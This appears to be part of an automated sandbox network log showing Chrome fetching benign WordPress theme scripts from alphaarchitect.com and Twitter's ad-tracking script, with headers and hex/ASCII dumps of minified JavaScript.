                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1020INData Raw: 67 26 26 28 64 3d 21 30 2c 30 21 3d 3d 74 2e 74 68 72 65 73 68 6f 6c 64 26 26 28 69 28 77 69 6e 64 6f 77 29 2e 68 65 69 67 68 74 28 29 3c 6d 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 3f 69 28 77 69 6e 64 6f 77 29 2e 68 65 69 67 68 74 28 29 2f 6d 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 3e 61 2e 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 61 74 69 6f 26 26 28 64 3d 21 31 29 3a 31 3e 61 2e 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 61 74 69 6f 26 26 28 64 3d 21 31 29 29 2c 64 26 26 28 6d 2e 70 61 72 65 6e 74 73 28 22 2e 66 75 73 69 6f 6e 2d 64 65 6c 61 79 65 64 2d 61 6e 69 6d 61 74 69 6f 6e 22 29 2e 6c 65 6e 67 74 68 7c 7c 28 6d 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74 79 22 2c 22 76 69 73 69 62 6c 65 22 29 2c 6f 3d 6d 2e 64 61 74 61 28 22 61 6e 69 6d 61 74 69
                                                                                                                                                                                                                                                                        Data Ascii: g&&(d=!0,0!==t.threshold&&(i(window).height()<m.outerHeight()?i(window).height()/m.outerHeight()>a.intersectionRatio&&(d=!1):1>a.intersectionRatio&&(d=!1)),d&&(m.parents(".fusion-delayed-animation").length||(m.css("visibility","visible"),o=m.data("animati
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        137192.168.2.449896141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC832OUTGET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-title.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:04 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-e84"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147821
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba33ffef42c6-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC878INData Raw: 65 38 34 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 66 6e 2e 61 77 62 41 6e 69 6d 61 74 65 54 69 74 6c 65 48 69 67 68 6c 69 67 68 74 73 41 6e 64 52 6f 74 61 74 69 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 22 69 6e 20 77 69 6e 64 6f 77 3f 74 2e 65 61 63 68 28 66 75 73 69 6f 6e 2e 67 65 74 4f 62 73 65 72 76 65 72 53 65 67 6d 65 6e 74 61 74 69 6f 6e 28 74 28 74 68 69 73 29 29 2c 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 6e 3d 66 75 73 69 6f 6e 2e 67 65 74 41 6e 69 6d 61 74 69 6f 6e 49 6e 74 65 72 73 65 63 74 69 6f 6e 44 61 74 61 28 69 29 2c 65 3d 6e 65 77 20 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                        Data Ascii: e84!function(t){"use strict";t.fn.awbAnimateTitleHighlightsAndRotations=function(){"IntersectionObserver"in window?t.each(fusion.getObserverSegmentation(t(this)),function(i){var n=fusion.getAnimationIntersectionData(i),e=new IntersectionObserver(functio
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 28 22 5b 64 61 74 61 2d 61 6e 69 6d 61 74 69 6f 6e 64 75 72 61 74 69 6f 6e 5d 22 29 2e 64 61 74 61 28 22 61 6e 69 6d 61 74 69 6f 6e 64 75 72 61 74 69 6f 6e 22 29 2c 6f 3d 76 6f 69 64 20 30 21 3d 3d 61 3f 32 30 30 2a 70 61 72 73 65 46 6c 6f 61 74 28 61 29 3a 30 3b 6e 2e 72 65 6d 6f 76 65 44 61 74 61 28 22 74 65 78 74 69 6c 6c 61 74 65 22 29 2c 74 28 69 29 2e 66 69 6e 64 28 22 2e 66 75 73 69 6f 6e 2d 74 65 78 74 69 6c 6c 61 74 65 22 29 2e 72 65 6d 6f 76 65 28 29 2c 74 28 69 29 2e 69 73 28 22 2e 66 75 73 69 6f 6e 2d 74 69 74 6c 65 2d 74 79 70 65 49 6e 2c 2e 66 75 73 69 6f 6e 2d 74 69 74 6c 65 2d 63 6c 69 70 49 6e 22 29 7c 7c 6e 2e 61 77 62 41 6e 69 6d 61 74 65 64 54 69 74 6c 65 52 6f 74 61 74 69 6f 6e 57 69 64 74 68 28 29 2c 6e 2e 74 65 78 74 69 6c 6c 61 74
                                                                                                                                                                                                                                                                        Data Ascii: ("[data-animationduration]").data("animationduration"),o=void 0!==a?200*parseFloat(a):0;n.removeData("textillate"),t(i).find(".fusion-textillate").remove(),t(i).is(".fusion-title-typeIn,.fusion-title-clipIn")||n.awbAnimatedTitleRotationWidth(),n.textillat
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 34 30 2e 36 2d 35 35 2e 36 2c 34 37 39 2d 31 33 2e 38 22 5d 7d 5b 74 28 6e 29 2e 64 61 74 61 28 22 68 69 67 68 6c 69 67 68 74 22 29 5d 2c 61 3d 74 28 29 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 69 29 7b 61 3d 61 2e 61 64 64 28 74 28 22 3c 70 61 74 68 3e 22 2c 7b 64 3a 69 7d 29 29 7d 29 2c 69 3d 74 28 22 3c 73 76 67 3e 22 2c 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 35 30 30 20 31 35 30 22 2c 70 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 3a 22 6e 6f 6e 65 22 7d 29 2e 68 74 6d 6c 28 61 29 2c 74 28 6e 29 2e 66 69 6e 64 28 22 2e 66 75 73 69 6f 6e 2d 68 69 67 68 6c 69
                                                                                                                                                                                                                                                                        Data Ascii: 40.6-55.6,479-13.8"]}[t(n).data("highlight")],a=t();"object"==typeof e&&e.forEach(function(i){a=a.add(t("<path>",{d:i}))}),i=t("<svg>",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 500 150",preserveAspectRatio:"none"}).html(a),t(n).find(".fusion-highli
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC107INData Raw: 67 68 6c 69 67 68 74 22 29 3b 6e 2e 6c 65 6e 67 74 68 26 26 28 6e 2e 61 77 62 41 6e 69 6d 61 74 65 54 69 74 6c 65 48 69 67 68 6c 69 67 68 74 73 41 6e 64 52 6f 74 61 74 69 6f 6e 73 28 29 2c 6e 2e 61 77 62 41 6e 69 6d 61 74 65 64 54 69 74 6c 65 52 6f 74 61 74 69 6f 6e 57 69 64 74 68 52 65 63 61 6c 63 28 29 29 7d 29 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: ghlight");n.length&&(n.awbAnimateTitleHighlightsAndRotations(),n.awbAnimatedTitleRotationWidthRecalc())})
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        138192.168.2.449894199.232.168.1574435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC530OUTGET /uwt.js HTTP/1.1
                                                                                                                                                                                                                                                                        Host: static.ads-twitter.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC543INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Length: 58876
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 29 Oct 2024 01:22:31 GMT
                                                                                                                                                                                                                                                                        ETag: "4328e910de583ad53b3a7a76455af005"
                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:04 GMT
                                                                                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000145-IAD, cache-par-lfpg1960091-PAR
                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding,Host
                                                                                                                                                                                                                                                                        P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
                                                                                                                                                                                                                                                                        x-tw-cdn: FT
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1378INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 36 31 37 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3b 74 2e 65 78 70 6f 72 74 73 3d 28 72 3d 72 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 26 26 28 72 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2e 63 72 79 70 74 6f 26 26 28 72 3d 73 65 6c 66 2e 63 72 79 70 74 6f 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 26 26 28 72 3d
                                                                                                                                                                                                                                                                        Data Ascii: !function(){var t={6173:function(t,e,n){var r;t.exports=(r=r||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1378INData Raw: 74 68 69 73 2e 77 6f 72 64 73 3d 74 7c 7c 5b 5d 2c 74 68 69 73 2e 73 69 67 42 79 74 65 73 3d 6e 75 6c 6c 21 3d 65 3f 65 3a 34 2a 74 2e 6c 65 6e 67 74 68 7d 2c 74 6f 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 7c 7c 66 29 2e 73 74 72 69 6e 67 69 66 79 28 74 68 69 73 29 7d 2c 63 6f 6e 63 61 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 77 6f 72 64 73 2c 6e 3d 74 2e 77 6f 72 64 73 2c 72 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 2c 69 3d 74 2e 73 69 67 42 79 74 65 73 3b 69 66 28 74 68 69 73 2e 63 6c 61 6d 70 28 29 2c 72 25 34 29 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 69 3b 6f 2b 2b 29 7b 76 61 72 20 61 3d 6e 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 72 2b 6f
                                                                                                                                                                                                                                                                        Data Ascii: this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||f).stringify(this)},concat:function(t){var e=this.words,n=t.words,r=this.sigBytes,i=t.sigBytes;if(this.clamp(),r%4)for(var o=0;o<i;o++){var a=n[o>>>2]>>>24-o%4*8&255;e[r+o
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1378INData Raw: 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 64 2e 70 61 72 73 65 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 29 29 7d 7d 2c 70 3d 63 2e 42 75 66 66 65 72 65 64 42 6c 6f 63 6b 41 6c 67 6f 72 69 74 68 6d 3d 75 2e 65 78 74 65 6e 64 28 7b 72 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 64 61 74 61 3d 6e 65 77 20 73 2e 69 6e 69 74 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 3d 30 7d 2c 5f 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 68 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74
                                                                                                                                                                                                                                                                        Data Ascii: ion(t){return d.parse(unescape(encodeURIComponent(t)))}},p=c.BufferedBlockAlgorithm=u.extend({reset:function(){this._data=new s.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=h.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigByt
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1378INData Raw: 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 65 28 72 29 26 26 28 69 3c 38 26 26 28 63 5b 69 5d 3d 6e 28 74 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 75 5b 69 5d 3d 6e 28 74 2e 70 6f 77 28 72 2c 31 2f 33 29 29 2c 69 2b 2b 29 2c 72 2b 2b 7d 28 29 3b 76 61 72 20 73 3d 5b 5d 2c 6c 3d 61 2e 53 48 41 32 35 36 3d 6f 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 69 2e 69 6e 69 74 28 63 2e 73 6c 69 63 65 28 30 29 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 72 3d 6e 5b 30 5d 2c 69 3d 6e 5b 31 5d 2c 6f 3d 6e 5b 32 5d 2c 61 3d 6e 5b 33
                                                                                                                                                                                                                                                                        Data Ascii: r(var r=2,i=0;i<64;)e(r)&&(i<8&&(c[i]=n(t.pow(r,.5))),u[i]=n(t.pow(r,1/3)),i++),r++}();var s=[],l=a.SHA256=o.extend({_doReset:function(){this._hash=new i.init(c.slice(0))},_doProcessBlock:function(t,e){for(var n=this._hash.words,r=n[0],i=n[1],o=n[2],a=n[3
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1378INData Raw: 72 20 69 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 74 68 69 73 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 6e 28 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 74 79 70 65 6f 66 20 74 2b 22 20 22 2b 74 2b 22 20 69 73 20 6e 6f 74 20 69 74 65 72 61 62 6c 65 28 63 61 6e 6e 6f 74 20 72 65 61 64 20 70 72 6f 70 65 72 74 79 20 53 79 6d 62 6f 6c 28 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 29 29 22 29 29 3b 76 61 72 20 72 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 29 3b 69 66 28 30 3d 3d 3d 72 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 65 28 5b 5d 29 3b 76 61 72 20 69 3d 72 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                                                        Data Ascii: r i=function(t){return new this((function(e,n){if(!t||void 0===t.length)return n(new TypeError(typeof t+" "+t+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var r=Array.prototype.slice.call(t);if(0===r.length)return e([]);var i=r.lengt
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1378INData Raw: 76 6f 69 64 20 64 28 74 29 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 29 72 65 74 75 72 6e 20 76 6f 69 64 20 70 28 28 72 3d 6e 2c 69 3d 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 61 70 70 6c 79 28 69 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2c 74 29 7d 74 2e 5f 73 74 61 74 65 3d 31 2c 74 2e 5f 76 61 6c 75 65 3d 65 2c 64 28 74 29 7d 63 61 74 63 68 28 65 29 7b 66 28 74 2c 65 29 7d 76 61 72 20 72 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 2c 65 29 7b 74 2e 5f 73 74 61 74 65 3d 32 2c 74 2e 5f 76 61 6c 75 65 3d 65 2c 64 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 74 29 7b 32 3d 3d 3d 74 2e 5f 73 74 61 74 65 26 26 30 3d 3d 3d 74 2e 5f 64 65 66 65 72 72 65 64 73 2e 6c 65 6e 67 74 68 26 26 75 2e 5f 69 6d 6d 65 64 69 61 74 65 46 6e
                                                                                                                                                                                                                                                                        Data Ascii: void d(t);if("function"==typeof n)return void p((r=n,i=e,function(){r.apply(i,arguments)}),t)}t._state=1,t._value=e,d(t)}catch(e){f(t,e)}var r,i}function f(t,e){t._state=2,t._value=e,d(t)}function d(t){2===t._state&&0===t._deferreds.length&&u._immediateFn
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1378INData Raw: 74 75 72 6e 20 6e 65 77 20 75 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 6e 28 74 29 7d 29 29 7d 2c 75 2e 72 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 75 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 61 28 74 29 29 72 65 74 75 72 6e 20 6e 28 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 50 72 6f 6d 69 73 65 2e 72 61 63 65 20 61 63 63 65 70 74 73 20 61 6e 20 61 72 72 61 79 22 29 29 3b 66 6f 72 28 76 61 72 20 72 3d 30 2c 69 3d 74 2e 6c 65 6e 67 74 68 3b 72 3c 69 3b 72 2b 2b 29 75 2e 72 65 73 6f 6c 76 65 28 74 5b 72 5d 29 2e 74 68 65 6e 28 65 2c 6e 29 7d 29 29 7d 2c 75 2e 5f 69 6d 6d 65 64 69 61 74 65 46 6e 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 65 74 49 6d 6d 65 64 69 61 74 65
                                                                                                                                                                                                                                                                        Data Ascii: turn new u((function(e,n){n(t)}))},u.race=function(t){return new u((function(e,n){if(!a(t))return n(new TypeError("Promise.race accepts an array"));for(var r=0,i=t.length;r<i;r++)u.resolve(t[r]).then(e,n)}))},u._immediateFn="function"==typeof setImmediate
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1378INData Raw: 68 72 6f 77 22 3d 3d 3d 69 29 74 68 72 6f 77 20 6f 3b 72 65 74 75 72 6e 20 43 28 29 7d 66 6f 72 28 6e 2e 6d 65 74 68 6f 64 3d 69 2c 6e 2e 61 72 67 3d 6f 3b 3b 29 7b 76 61 72 20 61 3d 6e 2e 64 65 6c 65 67 61 74 65 3b 69 66 28 61 29 7b 76 61 72 20 63 3d 67 28 61 2c 6e 29 3b 69 66 28 63 29 7b 69 66 28 63 3d 3d 3d 6c 29 63 6f 6e 74 69 6e 75 65 3b 72 65 74 75 72 6e 20 63 7d 7d 69 66 28 22 6e 65 78 74 22 3d 3d 3d 6e 2e 6d 65 74 68 6f 64 29 6e 2e 73 65 6e 74 3d 6e 2e 5f 73 65 6e 74 3d 6e 2e 61 72 67 3b 65 6c 73 65 20 69 66 28 22 74 68 72 6f 77 22 3d 3d 3d 6e 2e 6d 65 74 68 6f 64 29 7b 69 66 28 22 73 75 73 70 65 6e 64 65 64 53 74 61 72 74 22 3d 3d 3d 72 29 74 68 72 6f 77 20 72 3d 22 63 6f 6d 70 6c 65 74 65 64 22 2c 6e 2e 61 72 67 3b 6e 2e 64 69 73 70 61 74 63 68
                                                                                                                                                                                                                                                                        Data Ascii: hrow"===i)throw o;return C()}for(n.method=i,n.arg=o;;){var a=n.delegate;if(a){var c=g(a,n);if(c){if(c===l)continue;return c}}if("next"===n.method)n.sent=n._sent=n.arg;else if("throw"===n.method){if("suspendedStart"===r)throw r="completed",n.arg;n.dispatch
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1378INData Raw: 29 7d 28 69 2c 6f 2c 72 2c 61 29 7d 29 29 7d 72 65 74 75 72 6e 20 72 3d 72 3f 72 2e 74 68 65 6e 28 61 2c 61 29 3a 61 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 67 28 74 2c 65 29 7b 76 61 72 20 6e 3d 74 2e 69 74 65 72 61 74 6f 72 5b 65 2e 6d 65 74 68 6f 64 5d 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 6e 29 7b 69 66 28 65 2e 64 65 6c 65 67 61 74 65 3d 6e 75 6c 6c 2c 22 74 68 72 6f 77 22 3d 3d 3d 65 2e 6d 65 74 68 6f 64 29 7b 69 66 28 74 2e 69 74 65 72 61 74 6f 72 2e 72 65 74 75 72 6e 26 26 28 65 2e 6d 65 74 68 6f 64 3d 22 72 65 74 75 72 6e 22 2c 65 2e 61 72 67 3d 76 6f 69 64 20 30 2c 67 28 74 2c 65 29 2c 22 74 68 72 6f 77 22 3d 3d 3d 65 2e 6d 65 74 68 6f 64 29 29 72 65 74 75 72 6e 20 6c 3b 65 2e 6d 65 74 68 6f 64 3d 22 74 68 72 6f 77 22 2c 65 2e 61 72 67 3d 6e 65
                                                                                                                                                                                                                                                                        Data Ascii: )}(i,o,r,a)}))}return r=r?r.then(a,a):a()}}function g(t,e){var n=t.iterator[e.method];if(void 0===n){if(e.delegate=null,"throw"===e.method){if(t.iterator.return&&(e.method="return",e.arg=void 0,g(t,e),"throw"===e.method))return l;e.method="throw",e.arg=ne
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1378INData Raw: 61 74 6f 72 46 75 6e 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 72 65 74 75 72 6e 21 21 65 26 26 28 65 3d 3d 3d 64 7c 7c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 3d 3d 3d 28 65 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 65 2e 6e 61 6d 65 29 29 7d 2c 74 2e 6d 61 72 6b 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2c 68 29 3a 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 68 2c 63 28 74 2c 61 2c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 29 29 2c 74 2e 70
                                                                                                                                                                                                                                                                        Data Ascii: atorFunction=function(t){var e="function"==typeof t&&t.constructor;return!!e&&(e===d||"GeneratorFunction"===(e.displayName||e.name))},t.mark=function(t){return Object.setPrototypeOf?Object.setPrototypeOf(t,h):(t.__proto__=h,c(t,a,"GeneratorFunction")),t.p


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        139192.168.2.449897141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC836OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-button.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
